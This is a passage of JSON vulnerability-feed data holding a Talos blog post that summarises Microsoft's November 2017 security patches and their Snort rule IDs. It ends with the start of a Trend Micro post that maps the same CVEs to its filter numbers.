Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11871\">CVE-2017-11871 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11873\">CVE-2017-11873 - Scripting Engine Memory Corruption Vulnerability</a></li></ul><br /><h3 id=\"h.pmrxkbmph7q8\">Multiple CVEs - Scripting Engine Memory Corruption Vulnerability</h3><br />Multiple vulnerabilities have been identified in the scripting engine of Microsoft Edge that could allow an attacker to execute arbitrary code. These vulnerabilities manifest due to Microsoft Edge improperly handling objects in memory. 
Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit these vulnerabilities. Successful exploitation of these vulnerabilities could allow an attacker to execute code within the context of the current user.<br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11836</li><li>CVE-2017-11839</li><li>CVE-2017-11840</li><li>CVE-2017-11841</li><li>CVE-2017-11861</li><li>CVE-2017-11862</li><li>CVE-2017-11866</li><li>CVE-2017-11870</li><li>CVE-2017-11871</li><li>CVE-2017-11873</li></ul><h3 id=\"h.9bhb21vu9pw3\">Multiple CVEs - Scripting Engine Memory Corruption Vulnerability</h3><br />Multiple remote code execution vulnerabilities have been identified affecting the scripting engine in Microsoft browsers. These vulnerabilities manifest due to the scripting engine improperly handling objects in memory. Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code within the context of the current user. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit these vulnerabilities or, in some cases, opens a Microsoft Office document containing an embedded ActiveX control marked \"safe for initialization.\"<br /><br />The following is a list of CVEs related to these vulnerabilities.<br /><ul><li>CVE-2017-11837 </li><li>CVE-2017-11838</li><li>CVE-2017-11843</li><li>CVE-2017-11846</li><li>CVE-2017-11858 </li></ul><h3 id=\"h.l4j3cblo56e5\">CVE-2017-11845 - Microsoft Edge Memory Corruption Vulnerability</h3><br />A remote code vulnerability has been identified that affects Microsoft Edge. The vulnerability is related to the way Microsoft Edge accesses objects in memory. 
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with the same access rights as the current user. Scenarios where this vulnerability would likely be exploited include web-based attacks where a user navigates to a malicious webpage designed to exploit this vulnerability, or via the use of a malicious email attachment that the user is convinced to open. <br /><br /><h3 id=\"h.kwuhvlxn2rdl\">Multiple CVEs - Internet Explorer Memory Corruption Vulnerability</h3><br />Two remote code vulnerabilities have been discovered that affect Internet Explorer. These vulnerabilities are related to the way Internet Explorer accesses objects in memory. Successful exploitation of these vulnerabilities could result in the execution of arbitrary code with the same access rights as the current user. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where a user navigates to a malicious webpage designed to exploit this vulnerability, or via the use of a malicious email attachment that the user is convinced to open.<br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11855</li><li>CVE-2017-11856 </li></ul><h3 id=\"h.25ulimn27xx4\">CVE-2017-11869 - Scripting Engine Memory Corruption Vulnerability</h3><br />A vulnerability has been identified in the scripting engine of Internet Explorer that could allow an attacker to execute arbitrary code. This vulnerability manifests due to Internet Explorer improperly accessing objects in memory. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit these vulnerabilities. 
Successful exploitation of these vulnerabilities could allow an attacker to execute code within the context of the current user.<br /><br /><h2 id=\"h.ftn8wufn5bzc\">Vulnerabilities Rated Important</h2><br />The following vulnerabilities are rated \"Important\" by Microsoft:<br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11768\">CVE-2017-11768 - Windows Media Player Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11770\">CVE-2017-11770 - ASP.NET Core Denial Of Service Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11788\">CVE-2017-11788 - Windows Search Denial of Service Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11791\">CVE-2017-11791 - Scripting Engine Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11803\">CVE-2017-11803 - Microsoft Edge Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11827\">CVE-2017-11827 - Microsoft Browser Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11830\">CVE-2017-11830 - Device Guard Security Feature Bypass Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11831\">CVE-2017-11831 - Windows Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11832\">CVE-2017-11832 - Windows EOT Font Engine Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11833\">CVE-2017-11833 - Microsoft Edge Information 
Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11834\">CVE-2017-11834 - Scripting Engine Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11835\">CVE-2017-11835 - Windows EOT Font Engine Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11842\">CVE-2017-11842 - Windows Kernel Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11844\">CVE-2017-11844 - Microsoft Edge Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11847\">CVE-2017-11847 - Windows Kernel Elevation of Privilege Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11849\">CVE-2017-11849 - Windows Kernel Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11850\">CVE-2017-11850 - Microsoft Graphics Component Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11851\">CVE-2017-11851 - Windows Kernel Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11852\">CVE-2017-11852 - Windows GDI Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11853\">CVE-2017-11853 - Windows Kernel Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11854\">CVE-2017-11854 - Microsoft Word Memory Corruption Vulnerability</a></li><li><a 
href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11863\">CVE-2017-11863 - Microsoft Edge Security Feature Bypass Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11872\">CVE-2017-11872 - Microsoft Edge Security Feature Bypass Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11874\">CVE-2017-11874 - Microsoft Edge Security Feature Bypass Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11877\">CVE-2017-11877 - Microsoft Excel Security Feature Bypass Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11878\">CVE-2017-11878 - Microsoft Excel Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11879\">CVE-2017-11879 - ASP.NET Core Elevation Of Privilege Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11880\">CVE-2017-11880 - Windows Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882\">CVE-2017-11882 - Microsoft Office Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11884\">CVE-2017-11884 - Microsoft Office Memory Corruption Vulnerability</a></li></ul><h3 id=\"h.bdoa4s47wkbw\">CVE-2017-11768 - Windows Media Player Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects Windows Media Player. This vulnerability manifests due to Windows Media Player improperly disclosing file information. 
In order to exploit this vulnerability an attacker would need to authenticate to an affected system and execute a program designed to exploit this vulnerability. Successful exploitation of this vulnerability would allow an attacker to enumerate the existence of files stored on an affected system.<br /><br /><h3 id=\"h.q5rd6srfdkn8\">Multiple CVEs - ASP.NET Core Denial Of Service Vulnerability</h3><br />Multiple denial of service vulnerabilities have been identified that affect ASP.NET Core. These vulnerabilities manifest due to .NET Core improperly handling web requests. These vulnerabilities could be exploited remotely by an unauthenticated attacker. Successful exploitation could result in a denial of service condition. <br /><br />The following CVEs are related to these vulnerabilities:<br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11770\">CVE-2017-11770 - ASP.NET Core Denial Of Service Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11883\">CVE-2017-11883 - ASP.NET Core Denial Of Service Vulnerability</a></li></ul><h3 id=\"h.38zj0t9asa7l\">CVE-2017-11788 - Windows Search Denial of Service Vulnerability</h3><br />A denial of service vulnerability has been identified that affects Windows Search. This vulnerability manifests due to Windows Search improperly handling objects in memory. This vulnerability could be exploited by sending specially crafted messages to the Windows Search service. Additionally this vulnerability could be exploited by an unauthenticated remote attacker via Server Message Block (SMB). Successful exploitation of this vulnerability could result in a denial of service condition on affected systems.<br /><br /><h3 id=\"h.n7xhfhgh78f0\">CVE-2017-11791 - Scripting Engine Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects Microsoft browsers. 
This vulnerability manifests due to Microsoft browsers improperly handling objects in memory. This vulnerability could be leveraged by an attacker to obtain information that could be used for subsequent attacks against an affected system. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit this vulnerability.<br /><br /><h3 id=\"h.su1nmhb9yrz2\">Multiple CVEs - Microsoft Edge Information Disclosure Vulnerability</h3><br />Two information disclosure vulnerabilities have been identified that affect Microsoft Edge. These vulnerabilities manifest due to Microsoft Edge improperly handling objects in memory. These vulnerabilities could be leveraged by an attacker to obtain information that could be used for subsequent attacks against an affected system. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit these vulnerabilities.<br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11803</li><li>CVE-2017-11844</li></ul><h3 id=\"h.eak31u2c41u2\">CVE-2017-11827 - Microsoft Browser Memory Corruption Vulnerability</h3><br />A remote code execution vulnerability has been identified that affects Microsoft browsers. This vulnerability manifests due to the way in which Microsoft browsers access objects in memory. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with the same privileges as the current user. 
Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit this vulnerability or convincing a user to open a malicious email attachment.<br /><br /><h3 id=\"h.fn76sfmfrnf3\">CVE-2017-11830 - Device Guard Security Feature Bypass Vulnerability</h3><br />A security feature bypass vulnerability has been identified that affects Device Guard. This vulnerability manifests due to the way in which Device Guard incorrectly validates untrusted files. Successful exploitation of this vulnerability could allow an attacker to make an unsigned file appear as if it is signed, allowing an attacker to execute malicious files on affected systems.<br /><br /><h3 id=\"h.y3wb9e2yktsf\">Multiple CVEs - Windows Information Disclosure Vulnerability</h3><br />Multiple information disclosure vulnerabilities have been identified that affect the Windows kernel. These vulnerabilities manifest due to the Windows kernel failing to properly initialize memory addresses. These vulnerabilities could be leveraged by an attacker to obtain information that could be used for subsequent attacks against an affected system. Exploiting these vulnerabilities would require an attacker to authenticate to an affected device and execute an application designed to exploit this vulnerability.<br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11831</li><li>CVE-2017-11880</li></ul><h3 id=\"h.btsw9vna5f30\">Multiple CVEs - Windows EOT Font Engine Information Disclosure Vulnerability</h3><br />Two information disclosure vulnerabilities have been identified that affect Microsoft Windows Embedded OpenType (EOT). These vulnerabilities manifest due to the way in which the font engine parses embedded fonts. Successful exploitation of these vulnerabilities could allow an attacker to obtain information that could be used for subsequent attacks against an affected system. 
<br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11832</li><li>CVE-2017-11835</li></ul><h3 id=\"h.hzfeoreuofyd\">CVE-2017-11833 - Microsoft Edge Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects Microsoft Edge. This vulnerability manifests due to the way in which Microsoft Edge handles cross-origin requests. This vulnerability could be leveraged by an attacker to determine the origin of webpages within an affected browser. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit this vulnerability. <br /><br /><h3 id=\"h.3e1zkv9m7hzg\">CVE-2017-11834 - Scripting Engine Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability was identified that affects Internet Explorer. This vulnerability manifests due to the scripting engine in Internet Explorer not properly handling objects in memory. This vulnerability could be leveraged by an attacker to obtain information that could be used in additional attacks. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit this vulnerability. <br /><br /><h3 id=\"h.yv8u67oyrby6\">Multiple CVEs - Windows Kernel Information Disclosure Vulnerability</h3><br />Multiple information disclosure vulnerabilities were identified that affect the Windows Kernel-Mode Drivers. These vulnerabilities manifest due to the Windows Kernel failing to properly initialize memory addresses. These vulnerabilities could be leveraged by an attacker to obtain information that could be used in subsequent attacks to further compromise an affected system. 
Exploitation of these vulnerabilities would require an attacker to log in and execute a program specifically designed to exploit them.<br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11842</li><li>CVE-2017-11849</li><li>CVE-2017-11853</li></ul><h3 id=\"h.ispynop4ff07\">CVE-2017-11847 - Windows Kernel Elevation of Privilege Vulnerability</h3><br />A privilege escalation vulnerability has been identified that affects the Windows Kernel. This vulnerability manifests due to the Windows Kernel failing to properly handle objects in memory. Successful exploitation of this vulnerability would require an attacker to log on to a system and execute a program specifically designed to exploit this vulnerability and could allow an attacker to run arbitrary code in kernel memory.<br /><br /><h3 id=\"h.596vig5drvj1\">CVE-2017-11850 - Microsoft Graphics Component Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects the Microsoft Graphics Component. This vulnerability manifests due to the Windows GDI component disclosing kernel memory addresses. An attacker could leverage this vulnerability to obtain information that could be used for additional attacks against an affected system. Successful exploitation of this vulnerability would require an attacker to log on to a system and execute a program specifically designed to exploit this vulnerability.<br /><br /><h3 id=\"h.t8ap458u96px\">CVE-2017-11851 - Windows Kernel Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects the Microsoft Graphics Component. This vulnerability manifests due to the Windows GDI component disclosing kernel memory addresses. An attacker could leverage this vulnerability to obtain information that could be used for additional attacks against an affected system. 
Successful exploitation of this vulnerability would require an attacker to log on to a system and execute a program specifically designed to exploit this vulnerability.<br /><br /><h3 id=\"h.kti9vg98v2si\">CVE-2017-11852 - Windows GDI Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects the Microsoft Graphics Component. This vulnerability manifests due to the Windows GDI component disclosing kernel memory addresses. An attacker could leverage this vulnerability to obtain information that could be used for additional attacks against an affected system. Successful exploitation of this vulnerability would require an attacker to log on to a system and execute a program specifically designed to exploit this vulnerability.<br /><br /><h3 id=\"h.btbv13lo447t\">CVE-2017-11854 - Microsoft Word Memory Corruption Vulnerability</h3><br />A remote code execution vulnerability has been identified that affects Microsoft Office. This vulnerability manifests due to Microsoft Office improperly handling objects in memory. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code within the context of the current user. In order to exploit this vulnerability, an attacker would need to create a specially crafted file and convince a user to open it within an affected version of Microsoft Office.<br /><br /><h3 id=\"h.vfhxvo8e1vuz\">CVE-2017-11863 - Microsoft Edge Security Feature Bypass Vulnerability</h3><br />A security feature bypass has been identified in Microsoft Edge that could allow an attacker to load a page containing malicious content without the user's knowledge or consent. This vulnerability manifests in the Edge Content Security Policy where certain specially crafted documents are improperly validated. 
An attacker could exploit this vulnerability by convincing a user to navigate to a malicious page or by injecting malicious content into a page, such as an advertisement, thereby bypassing the Content Security Policy.<br /><br /><h3 id=\"h.9suck7nnkgfu\">CVE-2017-11872 - Microsoft Edge Security Feature Bypass Vulnerability</h3><br />A security feature bypass vulnerability has been identified in Microsoft Edge that could allow an attacker to bypass Cross-Origin Resource Sharing restrictions. This vulnerability manifests as a result of Edge improperly handling redirect requests and following redirect requests that should otherwise be ignored. An attacker could exploit this vulnerability by creating a specially crafted web page designed to exploit this vulnerability and convincing a user to visit the web page. Attackers could also leverage vulnerable or compromised web pages to exploit this vulnerability.<br /><br /><h3 id=\"h.9qx8ma9p7xwo\">CVE-2017-11874 - Microsoft Edge Security Feature Bypass Vulnerability</h3><br />A security feature bypass vulnerability has been identified in Microsoft Edge that could allow an attacker to bypass the Control Flow Guard. This vulnerability manifests as a result of the Edge Just-In-Time compiler incorrectly handling memory operations in compiled code. An attacker could exploit this vulnerability by creating a specially crafted web page designed to exploit this vulnerability and convincing a user to visit the web page.<br /><br /><h3 id=\"h.p53pt1akjudq\">CVE-2017-11877 - Microsoft Excel Security Feature Bypass Vulnerability</h3><br />A security feature bypass vulnerability has been identified that affects Microsoft Office. The vulnerability is related to Microsoft Office failing to enforce macro settings on Excel documents. 
Exploitation of this vulnerability does not result in code execution and requires an attacker to create a specially crafted file that is opened in an affected version of Microsoft Excel.<br /><br /><h3 id=\"h.recfefvinm40\">CVE-2017-11878 - Microsoft Excel Memory Corruption Vulnerability</h3><br />A remote code execution vulnerability has been identified that affects Microsoft Office. The vulnerability is related to Microsoft Office not properly handling objects in memory. Successful exploitation of this vulnerability could result in an attacker gaining the ability to execute arbitrary code within the context of the current user. Exploitation of this vulnerability requires an attacker to create a specially crafted file that is opened in an affected version of Microsoft Office. <br /><br /><h3 id=\"h.hyk2905styk6\">CVE-2017-11879 - ASP.NET Core Elevation Of Privilege Vulnerability</h3><br />An open redirect vulnerability has been identified that affects ASP.NET Core. Exploitation of this vulnerability could result in privilege escalation. In order to exploit this vulnerability an attacker would need to create a specially crafted URL which could be used to redirect the victim's browser session to a malicious site and obtain login session information.<br /><br /><h3 id=\"h.6020jwogk4nx\">Multiple CVEs - Microsoft Office Memory Corruption Vulnerability</h3><br />Multiple remote code execution vulnerabilities have been identified that affect Microsoft Office. These vulnerabilities are related to Microsoft Office not properly handling objects in memory. Successful exploitation of these vulnerabilities could result in an attacker gaining the ability to execute arbitrary code within the context of the current user. Exploitation of this vulnerability requires an attacker to create a specially crafted file that is opened in an affected version of Microsoft Office. 
<br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11882</li><li>CVE-2017-11884</li></ul><br /><h2 id=\"h.9bugt6nqiqht\">Vulnerabilities Rated Moderate</h2><br />The following vulnerabilities are rated \"Moderate\" by Microsoft:<br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11848\">CVE-2017-11848 - Internet Explorer Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11876\">CVE-2017-11876 - Microsoft Project Server Elevation of Privilege Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8700\">CVE-2017-8700 - ASP.NET Core Information Disclosure Vulnerability</a></li></ul><h3 id=\"h.wfk7ipeakm4m\">CVE-2017-11848 - Internet Explorer Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects Internet Explorer. This vulnerability manifests due to the way in which Internet Explorer handles page contents. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit this vulnerability. Successful exploitation of this vulnerability could allow an attacker to detect navigation of a user leaving a malicious web page. <br /><br /><h3 id=\"h.1fxj2jwk3xet\">CVE-2017-11876 - Microsoft Project Server Elevation of Privilege Vulnerability</h3><br />A privilege escalation vulnerability has been discovered affecting Microsoft Project. It is related to the way in which Microsoft Project Server improperly manages user sessions. The victim must be logged in to the target site in order for this vulnerability to be exploited. 
Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit this vulnerability. Successful exploitation of this vulnerability could allow an attacker to access content that the attacker is not authorized to access or impersonate the user within the web application. It could also enable the attacker to inject malicious contents into the victim's browser.<br /><br /><h3 id=\"h.wd4h9qqis9cx\">CVE-2017-8700 - ASP.NET Core Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects ASP.NET Core. This vulnerability could enable an attacker to bypass Cross-Origin Resource Sharing (CORS) configurations. Successful exploitation of this vulnerability could allow an attacker to access content that they are not authorized to access from within a web application.<br /><br /><h2 id=\"h.bipt9xzi68fa\">Coverage</h2><br />In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. 
Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.<br /><br />Snort Rules:<br /><ul><li>43120-43121</li><li>44809-44834</li><li>44838-44839</li><li>44843-44846</li></ul>For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal: <a href=\"http://www.talosintelligence.com/vulnerability-reports/\">http://www.talosintelligence.com/vulnerability-reports/</a><br /><br />To review our Vulnerability Disclosure Policy, please visit this site:<br /><br /><a href=\"http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html\">http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html</a>", "modified": "2017-11-14T19:54:05", "published": "2017-11-14T11:54:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/gKTSu-yN4pM/ms-tuesday.html", "id": "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "type": "talosblog", "title": "Microsoft Patch Tuesday - November 2017", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2017-11-26T20:03:00", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11768", "CVE-2017-11770", "CVE-2017-11788", "CVE-2017-11791", "CVE-2017-11803", "CVE-2017-11827", "CVE-2017-11830", 
"CVE-2017-11831", "CVE-2017-11832", "CVE-2017-11833", "CVE-2017-11834", "CVE-2017-11835", "CVE-2017-11836", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11839", "CVE-2017-11840", "CVE-2017-11841", "CVE-2017-11842", "CVE-2017-11843", "CVE-2017-11844", "CVE-2017-11845", "CVE-2017-11846", "CVE-2017-11847", "CVE-2017-11848", "CVE-2017-11849", "CVE-2017-11850", "CVE-2017-11851", "CVE-2017-11852", "CVE-2017-11853", "CVE-2017-11854", "CVE-2017-11855", "CVE-2017-11856", "CVE-2017-11858", "CVE-2017-11861", "CVE-2017-11862", "CVE-2017-11863", "CVE-2017-11866", "CVE-2017-11867", "CVE-2017-11869", "CVE-2017-11870", "CVE-2017-11871", "CVE-2017-11872", "CVE-2017-11873", "CVE-2017-11874", "CVE-2017-11876", "CVE-2017-11877", "CVE-2017-11878", "CVE-2017-11879", "CVE-2017-11880", "CVE-2017-11882", "CVE-2017-11883", "CVE-2017-8700"], "description": "\n\nThe dreaded white, blank screen in Microsoft Word is taunting me, with its blinking cursor asking for words to be written. Just when I thought I wouldn\u2019t get any inspiration for this week\u2019s blog, inspiration came to me from beyond through our late CTO Raimund Genes. Earlier this week, the third annual Trend Micro Capture the Flag (CTF), now known as the Raimund Genes Cup, competition was held in Tokyo, giving IT and security professionals the opportunity to expand their skill sets. A total of 10 teams participated in multiple challenges in categories including targeted attacks, Internet of Things (IoT), Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA). Team Egrf33ks won this year\u2019s competition and now qualifies for HITCON 2017. For the full results of this year\u2019s CTF, click [here](<https://www.trendmicro.com/en_us/campaigns/capture-the-flag.html>).\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine\u00ae (DV) package includes coverage for Microsoft updates released on or before November 14, 2017. 
It was another big month with 53 security patches covering Internet Explorer (IE), Microsoft Edge, Microsoft Windows, Microsoft Office, ASP.NET Core and .NET Core, and Chakra Core. 20 of the patches are listed as Critical and 31 are rated Important. Six of the Microsoft CVEs came through the Zero Day Initiative program. The following table maps Digital Vaccine filters to the Microsoft updates. Filters marked with an asterisk (*) shipped prior to this DV package, providing preemptive zero-day protection for customers. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [November 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/11/14/the-november-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-11768 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11770 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11788 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11791 | 29921 | \nCVE-2017-11803 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11827 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11830 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11831 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11832 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11833 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11834 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11835 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11836 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11837 | 29923 | \nCVE-2017-11838 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11839 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11840 | 
29926 | \nCVE-2017-11841 | 29933 | \nCVE-2017-11842 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11843 | 29931 | \nCVE-2017-11844 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11845 | 29930 | \nCVE-2017-11846 | 29932 | \nCVE-2017-11847 | 29924 | \nCVE-2017-11848 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11849 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11850 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11851 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11852 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11853 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11854 | 29929 | \nCVE-2017-11855 | 29918 | \nCVE-2017-11856 | *29744 | \nCVE-2017-11858 | *29832 | \nCVE-2017-11861 | 29925 | \nCVE-2017-11862 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11863 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11866 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11867 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11869 | *29794 | \nCVE-2017-11870 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11871 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11872 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11873 | 29927 | \nCVE-2017-11874 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11876 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11877 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11878 | *29784 | \nCVE-2017-11879 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11880 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11882 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11883 | | Vendor Deemed 
